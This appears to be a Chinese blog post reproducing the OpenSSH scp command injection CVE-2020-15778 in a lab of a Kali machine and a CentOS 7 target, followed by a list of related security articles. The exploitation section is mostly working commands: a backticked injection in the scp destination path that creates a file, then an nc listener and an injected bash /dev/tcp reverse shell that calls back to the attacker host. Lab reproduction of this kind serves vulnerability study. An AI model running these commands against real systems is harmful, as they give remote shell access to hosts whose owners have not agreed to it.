OpenSSH 命令注入漏洞(CVE-2020-15778)
2023-09-14 09:15:58 时间
介绍
2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。
漏洞影响版本
OpenSSH =< 8.3p1
漏洞复现要求
OpenSSH =< 8.3p1
需要知道ssh密码
搭建环境
centOS 7 IP:192.168.7.67
kali2019.4 IP:192.168.7.79
介绍一下scp命令:
下面开始行动:
关闭防火墙,(我没有关闭,在这里我也就不关闭了。)
查看ssh版本吧
1.ssh -V
首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件
scp 1.txt root@192.168.7.67:'`touch /tmp/test.txt` /tmp'
成功将kali上面的文件传入道centOS7面,和自己创建了文件。
直接进行nc反弹获取shell
先监听一个端口
- nc -lvvp 7777
进行反弹shell
scp test.txt root@192.168.7.67:'`bash -i >& /dev/tcp/192.168.7.79/7777 0>&1`/tmp/test1.txt'
成功拿取权限
总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了
相关文章
- 代码审计-MetInfo 6.0.0 sql注入漏洞
- DT6.0关于SQL注入漏洞修复问题
- 安全测试全面总结-6-SQL注入漏洞
- 安全测试全面总结-5-shell命令注入漏洞
- Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
- CVE-2022-40871 Dolibarr任意添加管理员与RCE漏洞分析
- 打造全自动漏洞赏金扫描工具
- Atlassian JIRA服务器模板注入漏洞复现(CVE-2019-11581)
- Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析
- SSRF漏洞详解与利用
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
- CVE-2021-43267漏洞修复手册
- OpenSSH权限提升漏洞(CVE-2021-41617)修复 Centos 7升级Openssh 8.8
- 通杀! 熬夜码的 - 八万字 - 让你一文读懂SQL注入漏洞原理及各种场景利用
- WEB漏洞攻防 - SQL注入 - 安全测试思路总结
- WEB漏洞攻防 - SQL注入 - 堆叠注入
- WEB漏洞攻防 -根据应用场景进行注入-POST注入、HTTP头部注入[HOST]、XFF注入
- SQL注入漏洞有哪些
- 7. 畅捷通T+任意文件上传漏洞分析
- 25.【转载】挖洞技巧:支付漏洞之总结
- web未授权访问漏洞总结——mongodb、redis、memcache、jboss、vnc、docker、zk、rsync
- 浅谈XXE漏洞攻击与防御——本质上就是注入,盗取数据用
- 16 - vulhub - Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
- 17 - vulhub - Django GIS SQL注入漏洞(CVE-2020-9402)
- WEB漏洞攻防 - SQL注入 - Dnslog注入
- WEB漏洞攻防 - SQL注入 - 安全测试思路总结
- WEB漏洞攻防 - 文件上传漏洞 - 配和文件解析漏洞绕过安全检测突破文件上传漏洞
- 漏洞修复--FreeType 安全漏洞 (CVE-2020-15999)
- Web应用程序漏洞-X-Forwarded-For注入
- 网络安全80端口—-PHP CGI参数注入执行漏洞
- 逻辑漏洞渗透与攻防(三)之登录前端验证漏洞
- 逻辑漏洞渗透与攻防(一)身份验证漏洞